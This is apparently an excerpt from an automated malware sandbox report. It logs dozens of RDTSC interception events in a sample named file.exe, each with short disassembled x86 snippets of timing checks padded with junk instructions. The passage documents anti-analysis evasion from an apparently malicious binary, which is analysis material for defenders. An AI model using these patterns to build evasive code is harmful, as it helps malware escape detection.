                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D31E9 second address: 13D31EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B034 second address: 137B03A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B03A second address: 137B0B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007EFD80CDE8C8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D38F0h], eax 0x0000002b mov ebx, dword ptr [ebp+1248C008h] 0x00000031 or di, 6497h 0x00000036 add eax, ebx 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007EFD80CDE8C8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D1D1Ah], ebx 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007EFD80CDE8D0h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B0B2 second address: 137B0B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B0B7 second address: 137B0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007EFD80CDE8CDh 0x0000000d nop 0x0000000e xor edi, 2553C534h 0x00000014 push 00000004h 0x00000016 mov ecx, dword ptr [ebp+122D1C82h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jg 00007EFD80CDE8CCh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3FA6 second address: 13D3FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC7A0 second address: 13DC7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC7A4 second address: 13DC7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFD80CCF02Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC7B8 second address: 13DC7D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CDE8D9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA930 second address: 13DA944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF02Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAAEE second address: 13DAB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007EFD80CDE8C6h 0x0000000c jmp 00007EFD80CDE8D5h 0x00000011 jg 00007EFD80CDE8C6h 0x00000017 js 00007EFD80CDE8C6h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE35 second address: 13DAE53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007EFD80CCF02Dh 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e js 00007EFD80CCF043h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE53 second address: 13DAE72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D7h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE72 second address: 13DAE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE78 second address: 13DAE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE7C second address: 13DAE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007EFD80CCF02Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE90 second address: 13DAEA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAEA7 second address: 13DAEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB442 second address: 13DB462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007EFD80CDE8CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB728 second address: 13DB72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DBC44 second address: 13DBC4E instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD80CDE8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DBF0C second address: 13DBF2B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007EFD80CCF036h 0x0000000c jmp 00007EFD80CCF030h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC4E4 second address: 13DC4F9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFD80CDE8C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d js 00007EFD80CDE8C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC4F9 second address: 13DC4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4F41 second address: 13E4F68 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD80CDE8C6h 0x00000008 jnp 00007EFD80CDE8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007EFD80CDE8CFh 0x00000016 jnp 00007EFD80CDE8C6h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4153 second address: 13E4159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4159 second address: 13E415D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E415D second address: 13E416B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007EFD80CCF02Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4546 second address: 13E456D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CDE8CEh 0x00000009 jmp 00007EFD80CDE8D5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E456D second address: 13E4580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4C4A second address: 13E4C65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007EFD80CDE8CFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4C65 second address: 13E4C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4C69 second address: 13E4C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4C6D second address: 13E4C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007EFD80CCF034h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EF36C second address: 13EF379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007EFD80CDE8C8h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EF379 second address: 13EF383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007EFD80CCF026h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ED651 second address: 13ED657 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ED657 second address: 13ED65D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ED65D second address: 13ED661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ED661 second address: 13ED68F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF034h 0x00000007 jo 00007EFD80CCF026h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 ja 00007EFD80CCF026h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ED68F second address: 13ED6C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D8h 0x00000007 jmp 00007EFD80CDE8D2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ED6C3 second address: 13ED6D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007EFD80CCF026h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ED6D2 second address: 13ED6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EDB36 second address: 13EDB63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007EFD80CCF042h 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EDB63 second address: 13EDB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EDF34 second address: 13EDF4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF037h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EE0AA second address: 13EE0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFD80CDE8C6h 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EE0B5 second address: 13EE0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007EFD80CCF026h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EE3B7 second address: 13EE3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EE3BB second address: 13EE3C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007EFD80CCF02Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EE3C9 second address: 13EE3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5D56 second address: 13F5D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5D5C second address: 13F5D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5D60 second address: 13F5D74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF030h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5D74 second address: 13F5DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007EFD80CDE8C6h 0x0000000d jng 00007EFD80CDE8C6h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007EFD80CDE8CEh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007EFD80CDE8CBh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5DA7 second address: 13F5DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F56ED second address: 13F56F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F56F1 second address: 13F5700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5700 second address: 13F5717 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007EFD80CDE8CBh 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5717 second address: 13F571D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F571D second address: 13F5721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5A24 second address: 13F5A4E instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jns 00007EFD80CCF026h 0x00000011 jmp 00007EFD80CCF032h 0x00000016 jnc 00007EFD80CCF026h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5A4E second address: 13F5A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F7571 second address: 13F7577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14076CF second address: 14076D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14076D7 second address: 14076FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF037h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007EFD80CCF026h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14076FA second address: 14076FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407860 second address: 1407864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407864 second address: 1407870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407870 second address: 140787E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF02Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140787E second address: 140789B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007EFD80CDE8D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140789B second address: 14078A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14078A1 second address: 14078A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14078A5 second address: 14078A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411AFE second address: 1411B24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007EFD80CDE8CAh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411B24 second address: 1411B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF033h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141CE5F second address: 141CE65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141CE65 second address: 141CE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141CE70 second address: 141CE76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141CD0E second address: 141CD12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142446C second address: 1424470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1424470 second address: 14244A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF037h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007EFD80CCF035h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14244A2 second address: 14244A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422E99 second address: 1422E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422FD5 second address: 1422FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422FD9 second address: 1422FDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142339D second address: 14233A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14233A1 second address: 14233A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14237BE second address: 14237CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007EFD80CDE8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14286FF second address: 1428718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFD80CCF031h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428718 second address: 1428724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFD80CDE8C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142889B second address: 14288B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007EFD80CCF035h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436D7E second address: 1436D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFD80CDE8D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436D9F second address: 1436DB3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD80CCF028h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007EFD80CCF026h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143866E second address: 1438698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007EFD80CDE8CEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1438698 second address: 14386C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF032h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007EFD80CCF030h 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14336AF second address: 14336C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446295 second address: 144629A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
